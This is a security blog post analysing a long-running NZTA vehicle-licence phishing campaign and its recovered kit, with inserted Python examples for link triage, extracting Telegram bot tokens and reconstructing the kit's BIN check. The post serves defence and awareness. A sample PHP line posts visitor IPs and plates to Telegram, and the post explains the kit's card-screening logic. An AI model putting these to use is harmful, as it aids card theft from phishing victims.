Chris Campbell Oct 22, 2024 26 min read

The Phish that won't die

After yesterday’s post that opened our 2024 Cyber Smart Week series, it only seems fitting to continue with something that many New Zealanders will be familiar with.

Since at least late 2019, the most prominent phishing template we have regularly seen has been vehicle licence (registration) renewals that leverage the brand of Waka Kotahi NZ Transport Agency. Distributed through both email and SMS, the numerous and frequently rampant campaigns have been reported by hundreds of thousands of New Zealanders, some of whom have fallen victim and lost their life savings.

For such a long-lived and widely distributed lure to remain viable, it has been updated over time, keeping it relevant and introducing improvements to the underlying phishing kit. In this post we’ll look at the evolution of the NZTA registration phish and analyse a recent campaign.

Historic Templates

While the approach of the email templates has not changed, some minor details have. For example:

  • Shift from “NZ Transport Agency”, to “Waka Kotahi NZ Transport Agency” (2022), to “NZ Transport Agency Waka Kotahi” (2024).
  • Inclusion of logos and official brand colours.
  • Slight changes in layout and design, including columns and link buttons.

The design and functionality of the phishing kit itself have remained largely unchanged, with only minor changes such as different log output options.

Samples

December 2021:

CS blog 2 - pic 1

February 2022:

CS blog 2 - pic 2

April 2023:

CS blog 2 - pic 3

September 2023:

CS blog 2 - pic 4

January 2024:

CS blog 2 - pic 5

Campaign Analysis

Identified on 20th October 2024, the following campaign was received by several users at a customer. Thankfully, there were no victims, and we were afforded the opportunity to analyse it.

The User Experience

The email template is very similar to the one first seen in January. No images are embedded, and text formatting is used to resemble the logo. Despite what the link text says, every link resolves to the same URL:

CS blog 2 - pic 6
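The "all links go to the same place" tell is easy to check mechanically when you are triaging a reported email. The following is an added example (not code from the post or the kit) that parses the anchors out of an HTML body, flags any whose host is not the expected brand domain, and flags any whose visible text names a different host than the one it actually points to. The brand domain nzta.govt.nz is assumed as the legitimate host, and SAMPLE_EMAIL is constructed for the example rather than being the campaign's real HTML.

```python
"""Triage the links in a suspected NZTA renewal email (added example).

Parses the anchors out of an HTML body and flags each one whose href host
is not the expected brand domain, or whose visible text names a different
host than the one it actually points to. SAMPLE_EMAIL is constructed for this
example and is not the campaign's real HTML.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class _AnchorCollector(HTMLParser):
    """Collects (href, visible text) pairs for every <a> in the document."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, " ".join("".join(self._text).split())))
            self._href = None


def host_of(url):
    return (urlparse(url).hostname or "").lower()


def triage_links(html, expected_host="nzta.govt.nz"):
    """Return one finding per anchor; an empty 'flags' list means it looks legitimate."""
    parser = _AnchorCollector()
    parser.feed(html)
    findings = []
    for href, text in parser.links:
        host = host_of(href)
        flags = []
        if not (host == expected_host or host.endswith("." + expected_host)):
            flags.append("off-brand host")
        # A host name written in the visible text that differs from the real target
        # is the classic "says nzta.govt.nz, goes somewhere else" tell.
        shown = re.search(r"[a-z0-9-]+(?:\.[a-z0-9-]+)*\.[a-z]{2,}", text.lower())
        if shown and shown.group(0) != host and not host.endswith("." + shown.group(0)):
            flags.append("text shows different host")
        findings.append({"href": href, "text": text, "host": host, "flags": flags})
    return findings


def distinct_targets(findings):
    """The set of URLs the email actually sends people to."""
    return {f["href"] for f in findings}


# Constructed sample in the style of the campaign: three differently worded links,
# all pointing at one path on a (fictional) compromised site.
SAMPLE_EMAIL = """
<p>Your vehicle licence (rego) is about to expire.</p>
<p><a href="http://shop.example-compromised.test/wp-content/VehicleLicenceEntry/">Renew now</a></p>
<p>Or visit <a href="http://shop.example-compromised.test/wp-content/VehicleLicenceEntry/">www.nzta.govt.nz/renew</a></p>
<p><a href="http://shop.example-compromised.test/wp-content/VehicleLicenceEntry/">Unsubscribe</a></p>
"""

if __name__ == "__main__":
    results = triage_links(SAMPLE_EMAIL)
    print(f"{len(results)} links, {len(distinct_targets(results))} distinct target(s)")
    for r in results:
        print(f"  {r['text']!r:32} -> {r['host']:40} {', '.join(r['flags']) or 'ok'}")
```

For the SMS variant there is no HTML to parse; the same idea reduces to comparing the host in the message's URL against the brand domain, since a shortener or a compromised site's hostname is the only thing the recipient can actually see.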

Clicking the link opens the default browser to the phishing kit, hosted in a subdirectory of a compromised website:

CS blog 2 - pic 7

After entering a plate number and selecting the renewal period, the user is presented with accurate details of the vehicle:

CS blog 2 - pic 8

Following the table is a summary of the renewal cost, and an option to proceed to payment or cancel. A detail to note here is that the page is dated 2021, whereas the legitimate page is current:

CS blog 2 - pic 9

Should the user choose to proceed, they’re presented with a standard payment form:

CS blog 2 - pic 10

Any card data submitted here is captured in a log or forwarded to an external service such as Telegram; this kit does the latter, as the server-side code below shows.

A spinning padlock icon sits on the loading page for a moment:

CS blog 2 - pic 11

The user then lands on a fake 3-D Secure (3DS) page branded for their card issuer. It requests additional information that helps the operators get past the challenges they encounter when abusing the submitted card:

CS blog 2 - pic 12

Inside the Kit

Due to a lapse in operational security by the kit operator, we were able to access all server-side artifacts.

At the root of the deployment directory is an .htaccess file, used both to rewrite friendly paths to specific files (e.g., VehicleLicenceEntry/ loads transact.php) and to geofence the kit to New Zealand residential and commercial IP address ranges:

CS blog 2 - pic 13

Foreign visitors receive an HTTP 403 (Forbidden) response, as do most New Zealand VPN exit nodes. This also means offshore sandboxes and URL scanners will typically see nothing but the 403, so analysis needs to come from an NZ egress point.

Core to the kit is its configuration, which defines the parameters for logging submissions. In this case, it's a Telegram bot token and several channel IDs:

CS blog 2 - pic 14

While the config can also be used to constrain visitors by geolocation, the .htaccess file already handles this with a blunter, IP-range based approach.

Submissions to the page are posted to “post/step1.php”, which drops a notification in the “BOT_CHAT_LOG” channel:

CS blog 2 - pic 15
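When a kit is recovered like this, the Telegram bot token and channel IDs in the config and in post/step1.php are the most actionable artifacts: the bot ID identifies the operator's infrastructure for an abuse report, and the channel IDs show where stolen data lands. The following is an added example (not code from the post or the kit) that pulls those values out of recovered source text and produces a redacted token for reporting. It assumes the kit's BOT_CHAT_* naming seen above; the token, chat IDs and PHP in SAMPLE_CONFIG are constructed for the example, not the campaign's.

```python
"""Pull the Telegram exfiltration details out of recovered kit source (added example).

Given the text of files such as the kit's config and post/step1.php, this finds the
bot token, the channel IDs it posts to, and the Bot API methods it calls, and produces
a redacted token suitable for an abuse report. SAMPLE_CONFIG is constructed for this
example; the token and chat IDs in it are made up, not the campaign's.
"""
import re

# Bot tokens look like "<numeric bot id>:<35-character secret>"; the secret
# alphabet is letters, digits, underscore and hyphen.
TOKEN_RE = re.compile(r"\b(\d{8,10}):([A-Za-z0-9_-]{35})\b")
# The kit names its destinations BOT_CHAT_<something>; the value is a signed
# integer, and channels/supergroups carry a -100 prefix.
CHAT_RE = re.compile(r"(BOT_CHAT_[A-Z_]+)\W+?(-?\d{6,})")
# Bot API method names appear as a path segment, e.g. /sendMessage?chat_id=...
METHOD_RE = re.compile(r"/(send[A-Z]\w+|getMe|getUpdates|getChat\w*)\b")


def extract_telegram(source: str) -> dict:
    """Tokens, bot IDs, named chat IDs and API methods found in the source text."""
    tokens = [f"{bot_id}:{secret}" for bot_id, secret in TOKEN_RE.findall(source)]
    return {
        "tokens": sorted(set(tokens)),
        "bot_ids": sorted({t.split(":")[0] for t in tokens}),
        "chats": dict(CHAT_RE.findall(source)),
        "methods": set(METHOD_RE.findall(source)),
    }


def redact_token(token: str) -> str:
    """Keep the bot ID (needed to identify the bot) and only a hint of the secret."""
    bot_id, secret = token.split(":", 1)
    return f"{bot_id}:{secret[:4]}..."


# Constructed sample in the style of the kit's config plus its notification call.
SAMPLE_CONFIG = r"""
<?php
$config = array(
  'BOT_TOKEN'    => '1234567890:AAHdqTcvCH1vGWJxfSeofSAs0K5PALDsawq',
  'BOT_CHAT_LOG' => '-1001111111111',
  'BOT_CHAT_CC'  => '-1002222222222',
);
$msg = "New visitor: " . $_SERVER['REMOTE_ADDR'] . " plate " . $_POST['plate'];
file_get_contents("https://api.telegram.org/bot" . $config['BOT_TOKEN'] .
                  "/sendMessage?chat_id=" . $config['BOT_CHAT_LOG'] . "&text=" . urlencode($msg));
"""

if __name__ == "__main__":
    found = extract_telegram(SAMPLE_CONFIG)
    for t in found["tokens"]:
        print("bot token:", redact_token(t))
    print("channels:", found["chats"])
    print("methods:", sorted(found["methods"]))
```

A recovered bot token is a live credential for the operator's bot; treat it as such, share only the redacted form outside the response team, and do not use it to interact with the bot yourself.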

The script also invokes the “get_plate_info” function found in functions.php, which makes a call out to NZTA’s “Tolling Online” API to retrieve the vehicle details for the submitted plate:

CS blog 2 - pic 16

If both the Telegram submission and the plate request succeed, the user is directed to the “VehicleInformation” (step2.php) page. This page renders the serialized result of the “get_plate_info” response and links the user to “PaymentGateway” (pay.php).

A trap for curious admins and analysts: the payment page first logs the IP address of every visitor to a local file, “cc-visit.txt”, so anyone who browses this far leaves a record for the operator:

CS blog 2 - pic 17

jQuery validation libraries check the form input client-side and, if it passes, permit the postback. The residual ASP.NET element names and properties make it quite apparent that the page was built from a cloned copy of the legitimate page's source:

CS blog 2 - pic 18

Like “post/step1.php”, “post/step2.php” also posts the form data to a Telegram channel:

CS blog 2 - pic 19

The function “is_local_bin” is called to validate that the first six digits of the card number (the Bank Identification Number, or BIN) indicate the card was issued by a New Zealand bank:

CS blog 2 - pic 20

This relies on a web service, lookup[.]binlist[.]net:

CS blog 2 - pic 21
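To make the BIN gate concrete, here is an added Python reconstruction of what “is_local_bin” does (this is not the kit's PHP and is not the author's code). It takes the first six digits, asks a BIN lookup for the issuing country and bank, and rejects anything not issued in NZ. The network call to lookup.binlist.net is replaced by an injectable lookup so the example runs offline; the response keys (scheme, type, country.alpha2, bank.name) follow that service's public JSON shape, but the records in FAKE_BINLIST are constructed and the Luhn pre-check is an assumption about what the jQuery validation does, not something the post confirms.

```python
"""Python reconstruction of the kit's BIN gate (added example, not the kit's PHP).

The kit takes the first six digits of the card number and asks lookup.binlist.net
which country and bank issued it, discarding anything not issued in NZ. Here the
network call is replaced by an injectable lookup so the logic runs offline; the
sample BIN records are constructed and do not describe real cards or banks.
"""
import json


def luhn_ok(pan: str) -> bool:
    """Standard Luhn check; assumed here to mirror the kit's client-side jQuery validation."""
    digits = [int(c) for c in pan if c.isdigit()]
    if not 12 <= len(digits) <= 19:
        return False
    total = 0
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:          # double every second digit from the right
            d = d * 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


# Constructed stand-in for the JSON the service returns (keys follow its public
# response shape: scheme, type, country.alpha2, bank.name). Values are made up.
FAKE_BINLIST = {
    "458100": {"scheme": "visa", "type": "debit",
               "country": {"alpha2": "NZ", "name": "New Zealand"},
               "bank": {"name": "Example NZ Bank"}},
    "400000": {"scheme": "visa", "type": "credit",
               "country": {"alpha2": "US", "name": "United States of America"},
               "bank": {"name": "Example US Bank"}},
}


def offline_lookup(bin6: str):
    """Returns the raw JSON body for a BIN, or None where the real service would 404."""
    record = FAKE_BINLIST.get(bin6)
    return json.dumps(record) if record else None


def is_local_bin(pan: str, lookup=offline_lookup, country="NZ"):
    """Mirror of the kit's check: (accepted, bank name, card type)."""
    pan = "".join(c for c in pan if c.isdigit())
    if not luhn_ok(pan):
        return False, None, None
    body = lookup(pan[:6])          # the kit keys on six digits, not the newer eight-digit BINs
    if body is None:
        return False, None, None
    data = json.loads(body)
    if data.get("country", {}).get("alpha2") != country:
        return False, None, None
    return True, data.get("bank", {}).get("name"), data.get("type")


if __name__ == "__main__":
    for pan in ("4581 0000 0000 0009", "4000 0000 0000 0002", "4581 0000 0000 0001"):
        print(pan, "->", is_local_bin(pan))
```

The practical point is that the operator is pre-screening: cards that fail the lookup or are foreign-issued never reach the bank-specific 3DS capture, which keeps the Telegram channel free of noise and means the bank name and card type are already known when the next page is chosen.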

Following successful validation of the BIN and submission to Telegram, the bank name and card type are stored as session variables, and the user is redirected to the “loading” (payment_loading.php) page. This first queries the kit config for the appropriate time to wait:

CS blog 2 - pic 22

It then redirects to the 3DS capture page for the card issuer:

CS blog 2 - pic 23

The kit is bundled with templates for the main New Zealand banks:

CS blog 2 - pic 24

Looking at Kiwibank as an example, all the images necessary to emulate a Kiwibank 3DS request are included:

CS blog 2 - pic 25

These brand a page that collects the access number, date of birth and phone number of the user – as seen above:

CS blog 2 - pic 26

The collected information varies between banks.

Response Options

  • Help staff keep up to date with the latest NZTA scams. New Zealand news sites such as Stuff also tend to relay any media releases that NZTA and other government agencies publish about scams that affect them.
  • More broadly, there is no single best resource for emerging phishing. While a lot is kept within cybersecurity trust groups, X/Twitter can still be a great resource using a list like this one that I maintain.
  • Feel welcome to share some of the samples that have been provided in this blog post. Ensure you’ve set up a reporting function within your organisation and share new observations with your staff. Reward those who take the time to report phishing to you.
  • Promote awareness of DIA and CERT NZ reporting options. Remember:

CS blog 2 - pic 27


About the author

Chris Campbell

Chris was that notoriously disobedient kid who sat at the back of the class and always seemed bored, but somehow still managed to ace all of his exams. Obsessed with the finer details and mechanics of everything in both the physical and digital realms, Chris serves as the Principal Security Architect within the Inde Security Team. His ventures into computer security began at an early age and haven't slowed down since. After a decade spent across security and operations, and evenings spent diving into the depths of malware and operating systems, he brings a wealth of knowledge to Inde along with a uniquely adversary focused approach to defence. Like many others at Inde, Chris likes to unwind by hitting the bike trails or pretending to be a BBQ pitmaster. He is also heavily involved in the leadership of security events, trust groups and research projects.
